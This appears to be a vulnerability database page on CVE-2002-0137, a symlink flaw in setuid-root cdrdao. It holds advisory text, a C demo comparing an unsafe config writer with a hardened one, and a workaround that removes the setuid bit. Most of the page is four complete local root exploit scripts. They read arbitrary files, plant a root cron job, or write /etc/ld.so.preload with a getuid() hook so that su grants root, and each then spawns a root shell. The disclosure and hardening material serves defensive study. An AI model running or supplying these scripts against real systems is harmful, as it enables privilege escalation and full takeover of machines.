CVE-2002-0137
CVSS 7.2
Published: 2002-03-25 00:00:00
Revised: 2016-10-17 22:16:28

[Original] CDRDAO 1.1.4 and 1.1.5 allows local users to overwrite arbitrary files via a symlink attack on the $HOME/.cdrdao configuration file.


[CNNVD] CDRDAO Home Directory Configuration File Symbolic Link Vulnerability (CNNVD-200203-055)

        
        CDRDAO is a free, open-source CD recording package for Linux and Unix. It is maintained by Andreas Mueller.
        When CDRDAO saves its configuration file .cdrdao into the user's home directory, the file is written with root ownership, and CDRDAO does not check whether $HOME/.cdrdao already exists before writing to it. Since the cdrdao executable is typically installed setuid root, a user who makes that path a symbolic link can overwrite root-owned files and potentially execute commands as root.
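As an added illustration (written for this page, not code from cdrdao or from any of the exploit authors below), the C program here reproduces the failure mode just described in a throwaway directory and contrasts it with a hardened config writer. `save_config_unsafe` does what the description says: it opens the config path for writing with whatever identity the process has, so a symlink at `$HOME/.cdrdao` redirects the write. `save_config_safe` drops to the real user ID before the write, opens with `O_NOFOLLOW`, and refuses a pre-existing file the real user does not own. The temp directory, the `victim` and `dotcdrdao` names and the `demo_*` functions are constructed for the example; no system path is modified, and the privilege-drop branch only runs when the binary really is setuid.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern from the advisory: a setuid-root program opens $HOME/.cdrdao
 * with its root identity. fopen "w" follows a symlink and truncates its target. */
int save_config_unsafe(const char *path, const char *data)
{
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(data, f);
    return fclose(f);
}

/* Hardened pattern: write as the real user, never follow a symlink at the final
 * component (O_NOFOLLOW), and refuse an existing file the real user does not own
 * (a hard link to a root-owned file would pass O_NOFOLLOW). In a setuid-root binary
 * seteuid(ruid) drops root and seteuid(euid) regains it through the saved set-user-ID;
 * when ruid == euid, as in this unprivileged demo, both calls are skipped. */
int save_config_safe(const char *path, const char *data)
{
    uid_t ruid = getuid(), euid = geteuid();
    int fd, rc = -1, saved; struct stat st;
    if (euid != ruid && seteuid(ruid) != 0) return -1;
    fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd >= 0) {
        size_t len = strlen(data);
        if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) &&
            st.st_uid == ruid && st.st_nlink == 1) {
            if (ftruncate(fd, 0) == 0 && write(fd, data, len) == (ssize_t)len)
                rc = 0;
        } else
            errno = EPERM;
        saved = errno; close(fd); errno = saved;
    }
    saved = errno;
    if (euid != ruid) seteuid(euid);
    errno = saved;
    return rc;
}

/* Constructed scenario (no real system path is touched): a temp dir holding a
 * "victim" file (stand-in for /etc/cron.d/cdr or /etc/ld.so.preload) and a
 * "dotcdrdao" symlink to it (stand-in for $HOME/.cdrdao). */
static int make_scenario(char *dir, char *victim, char *link)
{
    strcpy(dir, "/tmp/cdrdao-demo-XXXXXX");
    if (!mkdtemp(dir)) return -1;
    sprintf(victim, "%s/victim", dir);
    sprintf(link, "%s/dotcdrdao", dir);
    if (save_config_unsafe(victim, "original\n") != 0) return -1;  /* plain file, no link yet */
    return symlink(victim, link);
}

static int file_equals(const char *path, const char *expected)
{
    char buf[128];
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f); buf[n] = '\0';
    return strcmp(buf, expected) == 0;
}

static void cleanup(const char *d, const char *v, const char *l) { unlink(l); unlink(v); rmdir(d); }
#define PAYLOAD "* * * * * root /tmp/dao.sh\n"   /* the cron line used by exploit (2) below */

/* Each demo returns 1 when the writer behaved as its comment says, 0 otherwise. */
int demo_unsafe_clobbers_victim(void)   /* symlink followed, victim overwritten */
{
    char dir[64], victim[128], link[128];
    if (make_scenario(dir, victim, link) != 0) return -1;
    int result = save_config_unsafe(link, PAYLOAD) == 0 && file_equals(victim, PAYLOAD);
    cleanup(dir, victim, link);
    return result;
}

int demo_safe_refuses_symlink(void)     /* ELOOP from O_NOFOLLOW, victim intact */
{
    char dir[64], victim[128], link[128];
    if (make_scenario(dir, victim, link) != 0) return -1;
    int rc = save_config_safe(link, PAYLOAD), err = errno;
    int result = rc == -1 && err == ELOOP && file_equals(victim, "original\n");
    cleanup(dir, victim, link);
    return result;
}

int demo_safe_writes_own_file(void)     /* a genuine user-owned file is still updated */
{
    char dir[64], victim[128], link[128];
    if (make_scenario(dir, victim, link) != 0) return -1;
    int result = save_config_safe(victim, "device: /dev/cdrom\n") == 0 && file_equals(victim, "device: /dev/cdrom\n");
    cleanup(dir, victim, link);
    return result;
}
```

Dropping privileges before the write is the fix that covers everything, including a symlinked directory component that `O_NOFOLLOW` alone would still traverse; the open flags and ownership check are defence in depth for the case where the write genuinely must happen as root. Removing the setuid bit, as the workaround below does, removes the whole class of problem at the cost of requiring root to burn discs.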
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in complete system shutdown]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:andreas_mueller:cdrdao:1.1.4
cpe:/a:andreas_mueller:cdrdao:1.1.5

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0137
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0137
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200203-055
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=101102759631000&w=2
(UNKNOWN)  BUGTRAQ  20020112 cdrdao insecure filehandling
http://www.securityfocus.com/bid/3865
(UNKNOWN)  BID  3865

- Vulnerability information

CDRDAO Home Directory Configuration File Symbolic Link Vulnerability
High risk    Access Validation Error
Published: 2002-03-25 00:00:00    Updated: 2005-10-20 00:00:00
Local
        
        

- Advisories and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following to reduce the exposure:
        * Temporarily remove the setuid-root bit from the CDRDAO binary.
         # chmod a-s /usr/bin/cdrdao
        (Check the result with `ls -l /usr/bin/cdrdao`: the mode must no longer show an "s" in the owner execute position. Without setuid root, cdrdao writes $HOME/.cdrdao as the invoking user and the symlink buys nothing.)
        Vendor patch:
        CDRDAO
        ------
        At the time of this CNNVD entry the vendor had not provided a patch or upgrade, and users were advised to watch the vendor's home page for the latest version; the OSVDB and BID records later on this page report the fix in cdrdao 1.2.0.
        
        http://cdrdao.sourceforge.net

- Vulnerability information (21216)

CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (1) (EDBID:21216)
Platform: linux    Type: local
Date: 2002-01-13    Verified
Port: 0    Author: Anonymous
Vulnerable app: N/A
source: http://www.securityfocus.com/bid/3865/info

CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller.

When CDRDAO saves its configuration to the .cdrdao file in a user's home directory, the file is saved with root ownership. Additionally, CDRDAO does not check for the previous existence of this file. Since the cdrdao executable is typically installed setuid root, it is possible for a user to create this file as a symbolic link, which could result in the overwriting of root-owned files, or potentially allow the user to execute commands as root.

#!/bin/sh
# Arbitrary-file read through setuid-root cdrdao: the TOC below names the
# target file as raw track data, "cdrdao show-data" prints it as 16-bit
# sample values, and the /tmp/show helper turns those values back into bytes.

if [ "$1" ]; then
	cat > /tmp/t.c <<EOF
#include <stdio.h>
int     main()
{
	int     i;
	/* each input integer is one big-endian 16-bit sample: emit its two bytes */
	while (fscanf(stdin, "%i", &i) > 0)
	{
		printf("%c%c", (i & 0xff00) >> 8, i & 0xff);
	}
	return 0;
}
EOF
	# TOC whose only track's data comes from the file to be read
	cat > /tmp/t.toc <<EOF
CD_ROM
TRACK MODE1_RAW
FILE "$1" 0
EOF
	gcc /tmp/t.c -o /tmp/show
	# the sed strips the "offset:" prefix from each show-data line, leaving the sample values
	echo `cdrdao show-data -v 0 --force /tmp/t.toc 2>&1 | grep -v WARNING | sed 's/.*://g' ` | /tmp/show
	rm -f /tmp/t.c /tmp/show /tmp/t.toc
else
	echo "Syntax: $0 filename"
fi		

- Vulnerability information (21217)

CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (2) (EDBID:21217)
Platform: linux    Type: local
Date: 2002-01-13    Verified
Port: 0    Author: atomi
Vulnerable app: N/A
source: http://www.securityfocus.com/bid/3865/info
 

#!/bin/bash

## cdrdaohack.sh by Jens "atomi" Steube

ROOTEXECDIR="/etc/cron.d/cdr"
CDRDAO="/usr/bin/cdrdao"
USERCONF="$HOME/.cdrdao"

echo "Testing $CDRDAO"
if [ ! -u $CDRDAO ]; then
  echo "ERROR: $CDRDAO is not setuid or does not exist"
  exit 1
fi

echo "Generating Helper Files"

# Helper built and made setuid root by the cron job; when the attacker runs it,
# it removes the helper files and the cron entry and spawns a root shell.
cat > /tmp/daosh.c << EOF
#include <stdlib.h>
#include <unistd.h>
int main () { 
setuid(0); setgid(0);
unlink("/tmp/dao.sh");
unlink("/tmp/daosh.c");
unlink("/etc/cron.d/cdr");
unlink("$HOME/.cdrdao");
execl("/bin/bash","bash","-i",(char *)0);
return 1;
}
EOF

cat > /tmp/dao.sh << EOF
cc -o /tmp/daosh /tmp/daosh.c >/dev/null 2>&1
chown root /tmp/daosh >/dev/null 2>&1
chgrp root /tmp/daosh >/dev/null 2>&1
chmod 6755 /tmp/daosh >/dev/null 2>&1
exit 0
EOF

chmod 700 /tmp/dao.sh

echo "Backing up original $USERCONF file to $USERCONF.orig"
mv $USERCONF $USERCONF.orig >/dev/null 2>&1

echo "Creating Symlink on $USERCONF to $ROOTEXECDIR"
ln -s $ROOTEXECDIR $USERCONF

echo "Executing $CDRDAO"

# --save makes setuid-root cdrdao write its settings through $USERCONF, which
# now points at $ROOTEXECDIR. The newlines embedded in the option values put a
# cron.d line into that file that runs /tmp/dao.sh as root every minute; the
# trailing '#' comments out the rest of the written line.
$CDRDAO write --save --device '
* * * * * root /tmp/dao.sh >/dev/null 2>&1
#' --buffers '
' . >/dev/null 2>&1

echo "Waiting for Rootshell, wait at least 3 minutes"
while [ ! -u /tmp/daosh ]; do
  echo -n "."
  sleep 1
done

echo
echo "Entering Rootshell and removing Helper Files"
echo "Have Phun :-)"
/tmp/daosh
		

- Vulnerability information (21218)

CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (3) (EDBID:21218)
Platform: linux    Type: local
Date: 2002-01-13    Verified
Port: 0    Author: Anonymous
Vulnerable app: N/A
source: http://www.securityfocus.com/bid/3865/info
  

#!/bin/sh
# cdrdao local root exploit
# newbug [at] chroot.org
# IRC: irc.chroot.org #chroot
# May 2005
echo "cdrdao private exploit"
echo "This exploit only for Mandrake series"
echo "newbug [at] chroot.org"
echo "May 2005"

echo "checking if cdrdao is setuid ...";
if [ ! -u /usr/bin/cdrdao ]; then
        echo "[-] Failed";
        exit
fi
echo "[+] done.";
echo "checking if /etc/ld.so.preload already exist ..."
if [ -f /etc/ld.so.preload ]; then
        echo "[-] Failed."
        exit
else
        echo "[+] done."
fi

echo "checking if ~/.cdrdao already exist ..."
if [ -f ~/.cdrdao ]; then
        rm -rf ~/.cdrdao
fi
echo "[+] done."

cd /tmp

echo "preparing hook library ..."
# Once listed in /etc/ld.so.preload this library is loaded into every
# dynamically linked program, including su, which then sees getuid() == 0
# and skips password authentication.
cat >ld.so.c<<EOF
#include <sys/types.h>
#include <stdlib.h>
uid_t getuid()
{
        return 0;
}
EOF
echo "[+] done."
echo "preparing shell program ..."
cat >sh.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* made setuid root by the su command below; spawns a root shell and cleans up */
int main(int argc,char **argv)
{
        setreuid(0,0);
        setgid(0);

        unlink("/tmp/ld.so");
        if(getuid())
        {
                printf("[-] Failed.\n");
                unlink(argv[0]);
                exit(0);
        }
        printf("[+] Congratulation, You win the game !!\n");
        unlink("/etc/ld.so.preload");

        execl("/bin/bash","bash",(char *)0);

        return 0;
}
EOF
echo "[+] done."

echo "link .cdrdao ==> /etc/ld.so.preload ..."
ln -sf /etc/ld.so.preload ~/.cdrdao
echo "[+] done."

echo "compile hook library ..."
gcc -shared -o ld.so ld.so.c
echo "[+] done."
echo "compile shell program ..."
gcc -o sh sh.c
echo "[+] done."

umask 0

echo "run cdrdao ..."
cdrdao unlock --save >/dev/null 2>&1
echo "[+] done."

echo "checking if /etc/ld.so.preload created successful..."
if [ -f /etc/ld.so.preload ]; then
        echo "[+] done."
else
        echo "[-] Failed."
        exit
fi
echo "/tmp/ld.so">/etc/ld.so.preload
rm -f /tmp/sh.c
rm -f /tmp/ld.so.c
su -c "chown root.root /tmp/sh;chmod 4755 /tmp/sh" >/dev/null 2>&1
echo "!@#\$@%#$%#$%!@%^"
/tmp/sh
		

- Vulnerability information (21219)

CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (4) (EDBID:21219)
Platform: linux    Type: local
Date: 2002-01-13    Verified
Port: 0    Author: Karol Wiesek
Vulnerable app: N/A
source: http://www.securityfocus.com/bid/3865/info
   



#!/bin/sh
DIR=`pwd`
echo ""
echo "cdrdao local root exploit - gr doesn't protect you this time"
echo "Karol Więsek <appelast*drumnbass.art.pl>"
echo ""
sleep 2
umask 000
echo -n "[*] Checking if /etc/ld.so.preload doesn't exist ... "
if [ -f /etc/ld.so.preload ]; then
echo "WRONG"
echo "/etc/ld.so.preload exists, write another exploit ;P"
exit
else
echo "OK"
fi
echo -n "[*] Checking if su is setuid ... "
if [ -u /bin/su ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Creating evil *uid() library ... "
# preloaded into su via /etc/ld.so.preload so that su believes the caller is already root
cat > getuid_lib.c << _EOF
int getuid(void) {
	return 0; }
_EOF
gcc -o getuid_lib.o -c getuid_lib.c
ld -shared -o getuid_lib.so getuid_lib.o
rm -f getuid_lib.c getuid_lib.o
if [ -f ./getuid_lib.so ]; then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Creating suidshell ... "
cat > suid.c << _EOF
#include <unistd.h>
int main(void) {
	setgid(0); setuid(0);
	unlink("./suid");
	execl("/bin/sh","sh",(char *)0); }
_EOF
gcc -o suid suid.c
rm -f suid.c
if [ -x ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Exploiting cdrdao ... "
ln -sf /etc/ld.so.preload $HOME/.cdrdao
if [ ! -L $HOME/.cdrdao ];then
echo "Could'n link to \$HOME/.cdrdao"
exit
fi
cdrdao unlock --save 2>/dev/null
>/etc/ld.so.preload
echo "$DIR/getuid_lib.so" > /etc/ld.so.preload
su - -c "rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid"
# -u: the setuid bit su was asked to set (a plain non-empty-file test would pass even if su failed)
if [ -u ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
rm -f getuid_lib.so
unlink $HOME/.cdrdao
echo "Entering rootshell ... ;]"
./suid
		

- Vulnerability information

9753
CDRDAO .cdrdao Symlink Arbitrary File Overwrite
Location: Local Access Required
Attack type: Input Manipulation, Race Condition
Impact: Loss of Integrity
Solution: Upgrade
Exploit: Exploit Public
Disclosure: Vendor Verified, Third-party Verified

- Vulnerability description

cdrdao contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The vulnerability only exists if cdrdao is suid root. The issue is triggered when cdrdao saves its configuration settings to a user-accessible file, [$HOME]/.cdrdao, with root privileges. This allows a user to create a symlink to any file on the system and specify the data to be written to it. This flaw may lead to a loss of confidentiality, integrity and/or availability.

- Timeline

2002-01-12 Unknown
2002-01-12 Unknown

- Solution

Upgrade to version 1.2.0 or higher, as it has been reported to fix this vulnerability. A possible workaround is to remove the suid flag from the cdrdao binary.

- References

- Vulnerability author

- Vulnerability information

CDRDAO Home Directory Configuration File Symbolic Link Vulnerability
Class: Access Validation Error    BID: 3865
Remote: No    Local: Yes
Published: 2002-01-13 12:00:00    Updated: 2009-07-11 09:56:00
This vulnerability was announced by Jens Steube <jsteube@lastflood.com> via Bugtraq on January 13, 2002.

- Affected program versions

CDRDAO CDRDAO 1.1.9
CDRDAO CDRDAO 1.1.5
- Debian Linux 2.3 sparc
- Debian Linux 2.3 powerpc
- Debian Linux 2.3 arm
- Debian Linux 2.3 alpha
- Debian Linux 2.3 68k
- Debian Linux 2.3
CDRDAO CDRDAO 1.1.4
CDRDAO CDRDAO 1.2

- Unaffected program versions

CDRDAO CDRDAO 1.2

- Vulnerability discussion

CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller.

When CDRDAO saves its configuration to the .cdrdao file in a user's home directory, the file is saved with root ownership. Additionally, CDRDAO does not check for the previous existence of this file. Since the cdrdao executable is typically installed setuid root, it is possible for a user to create this file as a symbolic link, which could result in the overwriting of root-owned files, or potentially allow the user to execute commands as root.

- Exploits

The following exploits are available:

- Solution

The vendor has addressed this issue in cdrdao version 1.2.0.


CDRDAO CDRDAO 1.1.4

CDRDAO CDRDAO 1.1.5

CDRDAO CDRDAO 1.1.9

- References

 

 
